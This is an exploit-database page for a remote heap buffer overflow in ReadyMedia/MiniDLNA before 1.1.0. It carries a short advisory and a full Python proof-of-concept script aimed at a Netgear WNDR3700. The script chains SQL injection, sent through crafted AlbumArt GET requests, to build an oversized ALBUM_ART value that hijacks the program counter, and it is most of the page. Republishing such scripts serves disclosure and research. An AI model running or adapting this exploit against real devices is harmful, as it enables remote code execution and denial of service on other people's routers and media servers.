Vulners
Lucene search
ReadyMedia - Remote Heap Buffer Overflow
source: https://www.securityfocus.com/bid/61282/info
ReadyMedia is prone to a remote heap-based buffer-overflow vulnerability.
Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
ReadyMedia prior to 1.1.0 are vulnerable.
#!/usr/bin/env python
#AAAAinject.py
# Author: Zachary Cutlip
# [email protected]
# twitter: @zcutlip
#This script injects a buffer overflow into the ALBUM_ART table of
#MiniDLNA's SQLite database. When queried with the proper soap request,
#this buffer overflow demonstrates arbitrary code execution by placing a
#string of user-controlled 'A's in the CPU's program counter. This
#affects MiniDLNA version 1.0.18 as shipped with Netgear WNDR3700 version 3.
import math
import sys
import urllib,socket,os,httplib
import time
from overflow_data import DlnaOverflowBuilder
headers={"Host":"10.10.10.1"}
host="10.10.10.1"
COUNT=8
LEN=128
empty=''
overflow_strings=[]
overflow_strings.append("AA")
overflow_strings.append("A"*LEN)
overflow_strings.append("B"*LEN)
overflow_strings.append("C"*LEN)
overflow_strings.append("D"*LEN)
overflow_strings.append("A"*LEN)
overflow_strings.append("\x10\x21\x76\x15"*(LEN/4))
overflow_strings.append("\x10\x21\x76\x15"*(LEN/4))
overflow_strings.append("D"*LEN)
overflow_strings.append("D"*LEN)
overflow_strings.append("D"*LEN)
path_beginning='/AlbumArt/1;'
path_ending='-18.jpg'
details_insert_query='insert/**/into/**/DETAILS(ID,SIZE,TITLE,ARTIST,ALBUM'+\
',TRACK,DLNA_PN,MIME,ALBUM_ART,DISC)/**/VALUES("31337"'+\
',"PWNED","PWNED","PWNED","PWNED","PWNED","PWNED"'+\
',"PWNED","1","PWNED");'
objects_insert_query='insert/**/into/**/OBJECTS(OBJECT_ID,PARENT_ID,CLASS,DETAIL_ID)'+\
'/**/VALUES("PWNED","PWNED","container","31337");'
details_delete_query='delete/**/from/**/DETAILS/**/where/**/ID="31337";'
objects_delete_query='delete/**/from/**/OBJECTS/**/where/**/OBJECT_ID="PWNED";'
def build_injection_req(query):
request=path_beginning+query+path_ending
return request
def do_get_request(request):
conn=httplib.HTTPConnection(host,8200)
conn.request("GET",request,"",headers)
conn.close()
def build_update_query(string):
details_update_query='update/**/DETAILS/**/set/**/ALBUM_ART=ALBUM_ART'+\
'||"'+string+'"/**/where/**/ID="31337";'
return details_update_query
def clear_overflow_data():
print "Deleting existing overflow data..."
request=build_injection_req(details_delete_query)
do_get_request(request)
request=build_injection_req(objects_delete_query)
do_get_request(request)
time.sleep(1)
def insert_overflow_data():
print("Setting up initial database records....")
request=build_injection_req(objects_insert_query)
do_get_request(request)
request=build_injection_req(details_insert_query)
do_get_request(request)
print("Building long ALBUM_ART string.")
for string in overflow_strings:
req=build_injection_req(build_update_query(string))
do_get_request(req)
clear_overflow_data()
insert_overflow_data()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jul 2013 00:00Current
7.4High risk
Vulners AI Score7.4